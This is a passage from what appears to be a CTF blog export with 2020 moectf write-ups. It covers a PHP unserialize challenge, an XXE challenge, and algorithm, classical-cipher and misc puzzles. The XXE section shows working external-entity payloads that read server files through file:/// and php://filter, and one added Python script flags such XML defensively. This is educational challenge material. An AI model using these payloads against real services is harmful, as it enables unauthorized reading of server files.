class="string">'flag'</span>];</span><br><span class="line">unserialize(<span class="variable">$moe</span>);</span><br><span class="line"><span class="meta">?></span></span><br><span class="line">有一天,赤道企鹅在愉快的使用vim给学弟挖坑,突然伴随着身体的一阵抽搐,电脑死机了。企鹅悲痛欲绝,聪明的你能帮助企鹅找到他挖的坑吗?</span><br></pre></td></tr></table></figure><p>Code audit (reading), then write a script that generates the serialized result:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Moe</span> </span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$a</span> = <span class="string">'1'</span>;</span><br><span class="line"> <span class="keyword">protected</span> <span class="variable">$b</span> = <span class="string">'2'</span>;</span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$c</span> = <span class="string">'3'</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> Moe();</span><br><span class="line"><span class="keyword">echo</span> serialize(<span class="variable">$a</span>);</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img src="/images/2020moectf-Web/image-20201012234139309.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012234139309.png" srcset="" 
alt="image-20201012234139309"></p><p>我们把这些内容get提交到flag里面,,,嗯???没反应???</p><p>这里感谢一下Noah大佬(Noah,yyds),他说:你个屈屈一个菜鸡bb,这里面有空字符没显示出来,你个辣鸡!!!</p><p>我留下了屈辱的泪水,然后便查了一下相关资料:</p><p><img src="/images/2020moectf-Web/image-20201012235635813.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012235635813.png" srcset="" alt="image-20201012235635813"></p><p>知道直接复制粘贴网页上的内容是不行的,于是再次打开自己脚本的输出界面,Ctrl+U查看源代码,发现端倪:<img src="/images/2020moectf-Web/image-20201012235915242.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012235915242.png" srcset="" alt="image-20201012235915242"></p><p>在这里我们就可以看到缺少的空字符,所以我们在get的时候手动加上%00就好了。<img src="/images/2020moectf-Web/image-20201013000007210.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201013000007210.png" srcset="" alt="image-20201013000007210"></p><h2 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h2><p>没接触过,即刻学习<a href="https://blog.csdn.net/qq_36197704/article/details/82255043,https://blog.51cto.com/dearch/2136021,https://www.cnblogs.com/zhaijiahui/p/9147595.html">XXE漏洞</a>然后又看了看i春秋上面的视频,就尝试做这个题目。</p><p>先大致代码审计(阅读一下</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">// flag is in '/flags/flag1.txt' and '/flags/flag2.php'</span></span><br><span class="line"></span><br><span class="line">libxml_disable_entity_loader (<span class="literal">false</span>);</span><br><span class="line"><span class="variable">$xmlfile</span> = file_get_contents(<span class="string">'php://input'</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (strpos(<span class="variable">$xmlfile</span>,<span class="string">"flag1.txt"</span>) !== <span class="literal">FALSE</span>){</span><br><span class="line"> <span class="keyword">if</span> (strpos(<span class="variable">$xmlfile</span>,<span class="string">'file:/'</span>) === <span class="literal">FALSE</span>){</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Please use file protocol.<br/><br/>"</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (strpos(<span class="variable">$xmlfile</span>,<span class="string">"flag2.php"</span>) !== <span class="literal">FALSE</span>){</span><br><span class="line"> <span class="keyword">if</span> (strpos(<span class="variable">$xmlfile</span>,<span class="string">'file:/'</span>) !== <span class="literal">FALSE</span>){</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Why not try php://filter?"</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<br/><br/>'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$dom</span> = <span class="keyword">new</span> DOMDocument();</span><br><span class="line"><span class="variable">$dom</span>->loadXML(<span class="variable">$xmlfile</span>, LIBXML_NOENT | LIBXML_DTDLOAD); </span><br><span 
class="line"><span class="variable">$test</span> = simplexml_import_dom(<span class="variable">$dom</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$test</span>;</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>知道题目先把flag分成两个部分,然后分别采用两种协议,所以我们需要写两个payload。</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?xml version = "1.0"?></span></span><br><span class="line"><span class="meta"><!DOCTYPE <span class="meta-keyword">ANY</span> [</span></span><br><span class="line"><span class="meta"><span class="meta"><!ENTITY f <span class="meta-keyword">SYSTEM</span> <span class="meta-string">"file:///flags/flag1.txt"</span>></span></span></span><br><span class="line"><span class="meta">]></span></span><br><span class="line"><span class="tag"><<span class="name">x</span>></span><span class="symbol">&f;</span><span class="tag"></<span class="name">x</span>></span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta"><?xml version = "1.0"?></span></span><br><span class="line"><span class="meta"><!DOCTYPE <span class="meta-keyword">ANY</span> [</span></span><br><span class="line"><span class="meta"><span class="meta"><!ENTITY f <span class="meta-keyword">SYSTEM</span> <span 
class="meta-string">"php://filter/read=convert.base64-encode/resource=/flags/flag2.php"</span>></span></span></span><br><span class="line"><span class="meta">]></span></span><br><span class="line"><span class="tag"><<span class="name">x</span>></span><span class="symbol">&f;</span><span class="tag"></<span class="name">x</span>></span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img src="/images/2020moectf-Web/image-20201013001310512.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201013001310512.png" srcset="" alt="image-20201013001310512"></p><p><img src="/images/2020moectf-Web/image-20201013001332613.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201013001332613.png" srcset="" alt="image-20201013001332613"></p><p>base64解一下:</p><blockquote><p>第一部分:moectf{XXE_</p><p>第二部分密文:PD9waHAgJGZsYWcyID0gJzRuZF9waHBfZjFsdDNyfSc7ID8+</p><p>第二部分:<?php $flag2 = '4nd_php_f1lt3r}'; ?></p><p>moectf{XXE_4nd_php_f1lt3r}</p></blockquote></blockquote>]]></content>
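<![CDATA[
Added example (Python, not the write-up's own script): it reproduces the serialized Moe object the PHP script above emits, shows where PHP puts the NUL bytes that the browser swallowed, and checks why the copy without them is rejected. The length-field checker mirrors the check unserialize() performs; it is a simplified re-implementation, not PHP's code.

```python
# Added example, not the write-up's own script: reproduce what PHP's serialize()
# emits for class Moe. PHP marks property visibility inside the name itself:
#   public    a  -> "a"
#   protected b  -> "\0*\0b"        (NUL, '*', NUL, name)
#   private   c  -> "\0Moe\0c"      (NUL, class name, NUL, name)
# The s:N: length counts those NUL bytes, so a copy that lost them no longer parses.
import re
from urllib.parse import quote


def php_serialize_object(cls, props):
    """Serialize an object with string-valued properties the way PHP does.
    props: list of (visibility, name, value) tuples in declaration order."""
    parts = []
    for visibility, name, value in props:
        if visibility == "public":
            key = name
        elif visibility == "protected":
            key = "\0*\0" + name
        elif visibility == "private":
            key = "\0" + cls + "\0" + name
        else:
            raise ValueError("unknown visibility: " + visibility)
        parts.append('s:%d:"%s";s:%d:"%s";' % (len(key), key, len(value), value))
    return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(props), "".join(parts))


def length_fields_consistent(serialized):
    """Check each s:N:"..." field: N must equal the length of the string that
    follows, which is the check unserialize() performs on every string."""
    for m in re.finditer(r's:(\d+):"', serialized):
        n = int(m.group(1))
        end = m.end() + n
        if serialized[end:end + 2] != '";':
            return False
    return True


def as_query_value(serialized):
    """Percent-encode the payload for a GET parameter; every NUL becomes %00."""
    return quote(serialized, safe="")


# the property values the challenge's __destruct() checks for
MOE = [("public", "a", "1"), ("protected", "b", "2"), ("private", "c", "3")]

if __name__ == "__main__":
    payload = php_serialize_object("Moe", MOE)
    print(repr(payload))                       # the NULs show up as \x00
    print(length_fields_consistent(payload))   # True
    shown = payload.replace("\0", "")          # what the browser displayed
    print(length_fields_consistent(shown))     # False: the lengths no longer add up
    print(as_query_value(payload))             # %00 where each NUL belongs
```
]]>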
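<![CDATA[
Added example (Python, not the challenge's code): a server-side pre-check that flags inbound XML carrying a DTD with external entity declarations, the construction both payloads above rely on. The challenge only denylisted the string 'file:/', which the php://filter wrapper walks straight past; this check does not care which scheme the entity uses. The sample documents are the two payloads from the write-up plus a constructed harmless one.

```python
# Added example, not the challenge's code: detect DTD/external-entity declarations
# in untrusted XML before it reaches a parser that expands entities
# (the PHP above enables exactly that with LIBXML_NOENT | LIBXML_DTDLOAD).
import re

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY name SYSTEM "uri">  or  <!ENTITY name PUBLIC "pubid" "uri">
# a leading '%' marks a parameter entity, which is just as dangerous
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?([\w.\-]+)\s+(SYSTEM|PUBLIC)((?:\s+"[^"]*")+)',
    re.IGNORECASE,
)


def external_entities(doc):
    """Return one dict per external entity declaration found in the document."""
    found = []
    for m in ENTITY_RE.finditer(doc):
        literals = re.findall(r'"([^"]*)"', m.group(4))
        uri = literals[-1]          # SYSTEM has one literal, PUBLIC two; URI is last
        scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
        found.append({"name": m.group(2), "parameter": bool(m.group(1)),
                      "uri": uri, "scheme": scheme})
    return found


def reject_reason(doc):
    """None when the document is acceptable, otherwise a short reason.
    Policy: any DTD is rejected; a parser with entity expansion enabled resolves
    whatever the DTD declares, so denylisting one scheme (as the challenge does
    with 'file:/') is not a defence."""
    ents = external_entities(doc)
    if ents:
        return "external entity %s -> %s" % (ents[0]["name"], ents[0]["uri"])
    if DOCTYPE_RE.search(doc):
        return "DTD present"
    return None


# constructed samples: the two payloads from the write-up plus a harmless document
PAYLOAD_FILE = ('<?xml version="1.0"?>\n<!DOCTYPE ANY [\n'
                '<!ENTITY f SYSTEM "file:///flags/flag1.txt">\n]>\n<x>&f;</x>')
PAYLOAD_FILTER = ('<?xml version="1.0"?>\n<!DOCTYPE ANY [\n<!ENTITY f SYSTEM '
                  '"php://filter/read=convert.base64-encode/resource=/flags/flag2.php">'
                  '\n]>\n<x>&f;</x>')
BENIGN = '<?xml version="1.0"?>\n<x>hello</x>'

if __name__ == "__main__":
    for name, doc in (("file", PAYLOAD_FILE), ("filter", PAYLOAD_FILTER), ("benign", BENIGN)):
        print(name, "->", reject_reason(doc))
```
]]>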
<categories>
<category> CTF比赛题解 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
<tag> web </tag>
</tags>
</entry>
<entry>
<title>2020moectf Algorithm</title>
<link href="2020/10/13/2020moectf-Algorithm/"/>
<url>2020/10/13/2020moectf-Algorithm/</url>
<content type="html"><![CDATA[<p>The algorithm problems this time... how should I put it... I feel I didn't solve any of the ones that really test algorithms; I only did the ones that don't.</p><a id="more"></a><h2 id="mess"><a href="#mess" class="headerlink" title="mess"></a>mess</h2><img src="/images/2020moectf-Algorithm\image-20201009155437259.png" class="lazyload" data-srcset="/images/2020moectf-Algorithm\image-20201009155437259.png" srcset="" alt="image-20201009155437259" style="zoom:67%;"><figure class="highlight python"><pre><code>import random
flag = 'moectf{xxxxxxxxxxx}'
digit = ''
for i in flag:
    digit += str(ord(i))
i = 0
while i < len(digit):
    n = random.randint(0, 128)
    if ord('a') <= n <= ord('z') or ord('A') <= n <= ord('Z'):
        digit = digit[0:i] + chr(n) + digit[i:]
    i += 1
with open('puzzle.txt', 'w') as out:
    out.write(digit)

# 1091111A01ruVJl99hw11Qv6i102xCYC1c2B31DIsz1tm212l11A1l610448re11BQ09549115951n154V895F115d49109h1m1210810j11w2A5
</code></pre></figure><p>In plain terms, this problem converts every character of the flag to its ASCII code, lines the codes up in one row, and then inserts letters in between. So step one is to remove all the letters, then split the resulting digit string by hand: the moectf{} format is fixed, and for the rest I eyeballed it... and out it came:</p><figure class="highlight c++"><pre><code>#include<bits/stdc++.h>
using namespace std;
int main()
{
    string a;
    cin>>a;
    for(int i=0;i<a.size();i++)
        if(a[i]>='0' && a[i]<='9')
            cout<<a[i];
    return 0;
} 
//1091111A01ruVJl99hw11Qv6i102xCYC1c2B31DIsz1tm212l11A1l610448re11BQ09549115951n154V895F115d49109h1m1210810j11w2A5
//1091111019911610212311212111610448110954911595115489511549109112108101125
</code></pre></figure><figure class="highlight python"><pre><code>a=[109,111,101,99,116,102,123,112,121,116,104,48,110,95,49,115,95,115,48,95,115,49,109,112,108,101,125]
for i in a:
    print(chr(i),end='')
# 109,111,101,99,116,102,123,112,121,116,104,48,110,95,49,115,95,115,48,95,115,49,109,112,108,101,125
# moectf{pyth0n_1s_s0_s1mple}
</code></pre></figure><h2 id="Frank-永远滴神"><a href="#Frank-永远滴神" class="headerlink" title="Frank, Forever the GOAT"></a>Frank, Forever the GOAT</h2><img src="/images/2020moectf-Algorithm\image-20201009175357736.png" class="lazyload" data-srcset="/images/2020moectf-Algorithm\image-20201009175357736.png" srcset="" alt="image-20201009175357736" style="zoom:67%;"><p>u1s1 (honestly), this problem is just about learning how to walk a directory tree in Python... well, see the script:</p><figure class="highlight python"><pre><code>import os
from base64 import *
count = 0
path = "自己的目录\puzzle"
dirs1 = os.listdir(path)
for i in dirs1:
    path_1 = os.path.join(path,i)
    dirs2 = os.listdir(path_1)
    for j in dirs2:
        path_2 = os.path.join(path_1,j)
        dirs3 = os.listdir(path_2)
        for k in dirs3:
            path_3 = os.path.join(path_2,k)
            dirs4 = os.listdir(path_3)
            for m in dirs4:
                path_4 = os.path.join(path_3,m)
                print(path_4)
                f=open(path_4)
                file = f.read()
                f.close()
                count += file.count('FrankNB!')
# an int has no b64encode(); encode the decimal string instead
print(b64encode(str(count).encode()))

#moectf{MjA1MjMy}
</code></pre></figure><h2 id="赤道企鹅-永远滴神"><a href="#赤道企鹅-永远滴神" class="headerlink" title="Eqqie, Forever the GOAT"></a>Eqqie (赤道企鹅), Forever the GOAT</h2><img src="/images/2020moectf-Algorithm\image-20201009180540819.png" class="lazyload" data-srcset="/images/2020moectf-Algorithm\image-20201009180540819.png" srcset="" alt="image-20201009180540819" style="zoom:67%;"><p>This one only adds a data-processing step on top of the previous problem... so there isn't much to say; here is the script:</p><figure class="highlight python"><pre><code>import os
from base64 import *
count_n = 0
count_y = 0
count = 0

path = "H:\Competitions\moectf\Algorithm\Eqqie\puzzle"
dirs1 = os.listdir(path)
for i in dirs1:
    path_1 = os.path.join(path,i)
    dirs2 = os.listdir(path_1)
    for j in dirs2:
        path_2 = os.path.join(path_1,j)
        dirs3 = os.listdir(path_2)
        for k in dirs3:
            path_3 = os.path.join(path_2,k)
            dirs4 = os.listdir(path_3)
            for m in dirs4:
                path_4 = os.path.join(path_3,m)
                print(path_4) #walk the files
                f = open(path_4)
                file = f.read()
                f.close() #read the file
                if file[7]=='?':
                    count_n += 1
                    continue
                count_y += 1
                a = ""
                a += file[7:]
                flag = 1
                for ch in a:
                    if ('9'>=ch>='0' or 'z'>=ch>='a' or 'Z'>=ch>='A'):
                        if flag==1:
                            # first alphanumeric character of a new run: count the run
                            flag = 0
                            count += 1
                    else:
                        # a non-alphanumeric character ends the current run
                        flag=1

ans=str(count).encode()
print(b64encode(ans))
#moectf{MTgyNDI2}
</code></pre></figure><h2 id="千层饼"><a href="#千层饼" class="headerlink" title="Thousand-Layer Cake"></a>Thousand-Layer Cake (千层饼)</h2><img src="/images/2020moectf-Algorithm\image-20201009181151021.png" class="lazyload" data-srcset="/images/2020moectf-Algorithm\image-20201009181151021.png" srcset="" alt="image-20201009181151021" style="zoom:67%;"><p>First, the encryption script:</p><figure class="highlight python"><pre><code>from base64 import *
from random import Random
from flag import flag

alg = [b16encode, b32encode, b64encode, a85encode, b85encode]

r = Random()
for i in range(r.randrange(35,40)):
    er = r.choice(alg)
    flag = r.choice(alg)(str(alg.index(er)).encode()) + b'eqqie_is_god' + er(flag)

with open('secret.txt','wb') as out:
    out.write(flag)
with open('puzzle.txt', 'wb') as out:
    out.write(flag)
</code></pre></figure><p>The idea here is fairly obvious... to put it plainly, it's a matryoshka: layer after layer. I first half-solved it by hand, then wrote a fully automatic script; I won't post the half-manual one, here is the automatic one~~:</p><figure class="highlight python"><pre><code>from base64 import *

alg = [b16encode, b32encode, b64encode, a85encode, b85encode]
alg_s = [b16decode, b32decode, b64decode, a85decode, b85decode]
table = {}

def ini():
    # every way an index 0..4 can be encoded by one of the five algorithms -> that index
    for i in range(len(alg)):
        for j in range(5):
            tmp = alg[i](str(j).encode())
            table[tmp] = j

with open('puzzle.txt','r') as f:
    data = f.read()

print("index:")
for i in range(len(alg)):
    print(" ",i,": ",alg[i])

ini()
count = 0
print(table)
while 1:
    if 'eqqie_is_god' not in data:
        print(data)
        break
    key = data.index('eqqie_is_god')
    print(data[:key])
    # the text before the marker encodes which decoder to apply to the text after it
    data = alg_s[int(table[data[:key].encode()])](data[key+12:]).decode()
    count = count+1
    print(count)
print()
# moectf{so00Oo0oO_d31ici0us}
</code></pre></figure><p>emmm... I think my code is fairly easy to follow. That's all~~</p>]]></content>
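<![CDATA[
Added example (Python, not the write-up's own script) for the mess problem: it splits the digit string back into ASCII codes automatically instead of by eye. It goes a little beyond the write-up: over the flag alphabet used here (letters, digits, '_', '{', '}') a code starting with '1' must be three digits (100..125) and any other code must be two digits (48..99), so the split is unique, but the solver still backtracks so it also reports every decoding for alphabets where it is not. The puzzle string is the one from the write-up.

```python
# Added example, not the write-up's own script: automatic recovery of the ASCII
# codes from the puzzle string the generator above produces.
import re
import string

ALPHABET = set(string.ascii_letters + string.digits + "_{}")  # assumed flag charset
PUZZLE = ("1091111A01ruVJl99hw11Qv6i102xCYC1c2B31DIsz1tm212l11A1l610448re11BQ09549"
          "115951n154V895F115d49109h1m1210810j11w2A5")  # from the write-up


def strip_letters(s):
    """Remove the randomly inserted letters, keeping only the digit stream."""
    return re.sub(r"[A-Za-z]", "", s)


def decode_digits(digits, alphabet=ALPHABET, prefix="moectf{", suffix="}"):
    """Return every way to split `digits` into ASCII codes of `alphabet`
    characters such that the decoded text starts with prefix and ends with suffix.
    Depth-first search with pruning on the known prefix."""
    results = []

    def walk(pos, acc):
        if pos == len(digits):
            if acc.startswith(prefix) and acc.endswith(suffix):
                results.append(acc)
            return
        # the text decoded so far must still agree with the known prefix
        if not prefix.startswith(acc[:len(prefix)]):
            return
        for width in (2, 3):
            chunk = digits[pos:pos + width]
            if len(chunk) < width or chunk[0] == "0":
                continue
            ch = chr(int(chunk))
            if ch in alphabet:
                walk(pos + width, acc + ch)

    walk(0, "")
    return results


def solve(puzzle):
    """Full pipeline: drop the inserted letters, then split the digits."""
    return decode_digits(strip_letters(puzzle))


if __name__ == "__main__":
    print(strip_letters(PUZZLE))
    print(solve(PUZZLE))
```
]]>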
<categories>
<category> CTF比赛题解 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> program </tag>
<tag> wp </tag>
</tags>
</entry>
<entry>
<title>2020moectf Classic Crypto</title>
<link href="2020/10/09/2020moectf-Classic-Crypto/"/>
<url>2020/10/09/2020moectf-Classic-Crypto/</url>
<content type="html"><![CDATA[<p>This competition even had a dedicated Classic Crypto category, which is genuinely rare. I finished all of the classical cryptography problems too; they account for 9.35 of my total score.</p><a id="more"></a><h2 id="大帝的征程-1"><a href="#大帝的征程-1" class="headerlink" title="The Emperor's Journey #1"></a>The Emperor's Journey #1</h2><img src="/images/2020moectf Classic Crypto/image-20201008093647321.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201008093647321.png" srcset="" alt="image-20201008093647321" style="zoom:67%;"><p>The Emperor -> Caesar -> Caesar cipher</p><p>Since this is moectf, the flag must begin with moectf, so the shift can be computed and the answer drops out:</p><blockquote><p>Ciphertext: zbrpgs{p0adh3e_gu3_j0eyq}</p><p>Plaintext: moectf{c0nqu3r_th3_w0rld}</p></blockquote><h2 id="大帝的征程-2"><a href="#大帝的征程-2" class="headerlink" title="The Emperor's Journey #2"></a>The Emperor's Journey #2</h2><img src="/images/2020moectf Classic Crypto/image-20201008094106912.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201008094106912.png" srcset="" alt="image-20201008094106912" style="zoom:67%;"><p>This one is surely still Caesar, but since it is #2 it must be a Caesar variant; I tried a few things with no luck... so I opened the hint:</p><p><img src="/images/2020moectf Classic Crypto/image-20201008094329085.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201008094329085.png" srcset="" alt="image-20201008094329085"></p><p>After reading the hint I understood at once: it is a Caesar cipher over a custom table, so I had to write my own script:</p><figure class="highlight c++"><pre><code>#include<bits/stdc++.h>
using namespace std;
int main()
{
    string table="0abcdefghijklmnopqrstuvwxyz0123456789";//one small point: I put a 0 at the front of the table as a placeholder, since counting from 1 is more comfortable
    string a;
    cin>>a;
    for(int i=0;i<a.size();i++)
    {
        if(a[i]!='{' && a[i]!='}' && a[i]!='_')
        {
            for(int j=1;j<table.size();j++)
            {
                if(table[j]==a[i])
                {
                    int temp;
                    temp=(j+36*2-i)%36;
                    if(temp==0) temp=36;//index 0 is only the placeholder; a zero remainder means the last real entry
                    cout<<table[temp];
                }
            }
        }
        else cout<<a[i];
    }
    return 0;
} 
</code></pre></figure><blockquote><p>Ciphertext: mpgfxk{j8w05q4_8xk_d7mhqfht}<br>Plaintext: moectf{c0nquer_th3_un1v3rs3}</p></blockquote><h2 id="外面的世界"><a href="#外面的世界" class="headerlink" title="The World Outside"></a>The World Outside (外面的世界)</h2><img src="/images/2020moectf Classic Crypto/image-20201008203506687.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201008203506687.png" srcset="" alt="image-20201008203506687" style="zoom:67%;"><p>"The world outside" + a blind guess from the ciphertext => rail fence cipher</p><p>Decrypt it online.</p><p>PS: when working with a rail fence cipher, be careful when copying and pasting; don't copy an extra space... or it won't decrypt.</p><blockquote><p>Ciphertext: mc{i33ny_-n~otR1n_cp1FN}efaFc32Tsuy</p><p>Plaintext: moectf{Rai1F3nc3_3nc2ypT_1s-FunNy~}</p></blockquote><h2 id="大帝的征程-3"><a href="#大帝的征程-3" class="headerlink" title="The Emperor's Journey #3"></a>The Emperor's Journey #3</h2><img src="/images/2020moectf Classic Crypto/image-20201008204719395.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201008204719395.png" srcset="" alt="image-20201008204719395" style="zoom:67%;"><p>Uh... this ciphertext contains some odd characters, so this Caesar's table is presumably the whole ASCII table... then I remembered (the setter hinted at it) that there is a cipher over the ASCII range called <a href="https://blog.csdn.net/weixin_30298497/article/details/96365885?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.channel_param&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.channel_param">ROT47</a>, so let's try an online decoder:</p><blockquote><p>Ciphertext: >@64E7L4_?BF6C0E9b0)s$trN</p><p>Plaintext: moectf{c0nquer_th3_XDSEC}</p></blockquote><h2 id="大帝的征程-维吉尼亚"><a href="#大帝的征程-维吉尼亚" class="headerlink" title="The Emperor's Journey #Vigenère"></a>The Emperor's Journey #Vigenère</h2><img src="/images/2020moectf Classic Crypto/image-20201009010325841.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201009010325841.png" srcset="" alt="image-20201009010325841" style="zoom:67%;"><p>u1s1 (honestly), I solved this one by hand... since the answer must end up as moectf{……}, we line moectf up against the ciphertext and read off the key: dsecx</p><p>Then run it through an online tool:</p><blockquote><p>Ciphertext: pgieqi{k0_ajxW_k-R3zq?}</p><p>Key: dsecx</p><p>Plaintext: moectf{s0_whaT_s-N3xt?}</p></blockquote><h2 id="大帝的征程-维吉尼亚Ex"><a href="#大帝的征程-维吉尼亚Ex" class="headerlink" title="The Emperor's Journey #Vigenère Ex"></a>The Emperor's Journey #Vigenère Ex</h2><img src="/images/2020moectf Classic Crypto/image-20201009011339610.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201009011339610.png" srcset="" alt="image-20201009011339610" style="zoom:67%;"><p>Download the attachment and search through it for the ciphertext: ooukot{ig3_oqf1_Ymiedmms_BzVn3_s0w_w0_3csO}</p><p>For this problem I'll offer two approaches:</p><h3 id="手撕"><a href="#手撕" class="headerlink" title="By hand"></a>By hand</h3><p>They say it's hard to do by hand, but is it???</p><p>I don't believe it! I want to try.</p><p>First, moectf is definitely correct. And because Vigenère only changes letters and leaves digits alone, from 3->e and 0->O together with the fact that part of the key repeats, we can guess some pieces: ig3->th3, Ymiedmms -> Vigenere, w0 -> s0, s0w -> n0t, 3csO -> 3asy…… and at this point the key is more or less out already (even if the key isn't fully recovered at this point, the remaining 1 or 2 unknown letters can be brute-forced~~).</p><blockquote><p>Ciphertext: ooukot{ig3_oqf1_Ymiedmms_BzVn3_s0w_w0_3csO}</p><p>Key: caqivopzxmfde</p><p>Plaintext: moectf{th3_rea1_Vigenere_MaYb3_n0t_s0_3asY}</p></blockquote><h3 id="正解"><a href="#正解" class="headerlink" title="The proper solution"></a>The proper solution</h3><p>There is a method called <a href="https://www.cnblogs.com/ISGuXing/p/9665904.html">"index of coincidence comparison"</a> for breaking Vigenère ciphers; the <a href="https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx">online tool</a> is here~~</p><p><img src="/images/2020moectf Classic Crypto/image-20201009013434884.png" class="lazyload" data-srcset="/images/2020moectf Classic Crypto/image-20201009013434884.png" srcset="" alt="image-20201009013434884"></p><p>If you know the key length and fill it in it's a bit faster, but even with nothing filled in this site is quite fast~~</p><blockquote><p>moectf{th3_rea1_vigenere_mayb3_n0t_s0_3asy}</p></blockquote>]]></content>
<categories>
<category> CTF比赛题解 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
<tag> Crypto </tag>
</tags>
</entry>
<entry>
<title>2020moectf-MISC</title>
<link href="2020/10/08/2020moectf-MISC/"/>
<url>2020/10/08/2020moectf-MISC/</url>
<content type="html"><![CDATA[<p>Preface: this moectf had 17 misc challenges and I solved 14 of them. In the end misc turned out to be about 22% of my total score, the largest share, so apparently I am a misc player (<del>binary player</del>). Misc writeups are also the easiest to write, so I am starting with them. For the ones I didn't solve I will wait for the official solutions; I really couldn't crack them...</p><a id="more"></a><h2 id="我做出来的"><a href="#我做出来的" class="headerlink" title="我做出来的"></a>Solved</h2><h3 id="welcome"><a href="#welcome" class="headerlink" title="welcome"></a>welcome</h3><img src="/images/2020moectf-MISC/image-20201007194912998.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007194912998.png" srcset="" alt="image-20201007194912998" style="zoom: 67%;"><p>Two downloads: an image and a getting-started guide</p><p>The image:</p> <img src="/images/2020moectf-MISC/profession.jpg" class="lazyload" data-srcset="/images/2020moectf-MISC/profession.jpg" srcset="" alt="2" style="zoom:33%;"><p>It is the first challenge, so it shouldn't be hard. A look in WinHex:<img src="/images/2020moectf-MISC/image-20201007195310368.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007195310368.png" srcset="" alt="image-20201007195310368"></p><blockquote><p>flag: moectf{Jo1n_0ur_professional_group}</p></blockquote><p>By the way, that PDF is well written; I am keeping it for a closer read...</p><h3 id="MD5"><a href="#MD5" class="headerlink" title="MD5"></a>MD5</h3><img src="/images/2020moectf-MISC/image-20201007195738704.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007195738704.png" srcset="" alt="image-20201007195738704" style="zoom:67%;"><p><img src="/images/2020moectf-MISC/image-20201007195923023.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007195923023.png" srcset="" alt="image-20201007195923023"></p><p>Something this notorious has to be the flag...</p><blockquote><p>flag:moectf{114514}</p></blockquote><h3 id="Base64"><a href="#Base64" class="headerlink" title="Base64"></a>Base64</h3><img src="/images/2020moectf-MISC/image-20201007200035920.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007200035920.png" srcset="" alt="image-20201007200035920" style="zoom:67%;"><blockquote><p>Ciphertext: bW9lY3RmJTdCZXpfYjY0JTIxJTdE</p><p>After decoding (the Base64 yields a URL-encoded string, which decodes to): moectf{ez_b64!}</p></blockquote><h3 id="hey-fxck-you"><a href="#hey-fxck-you" class="headerlink" title="hey fxck you!"></a>hey 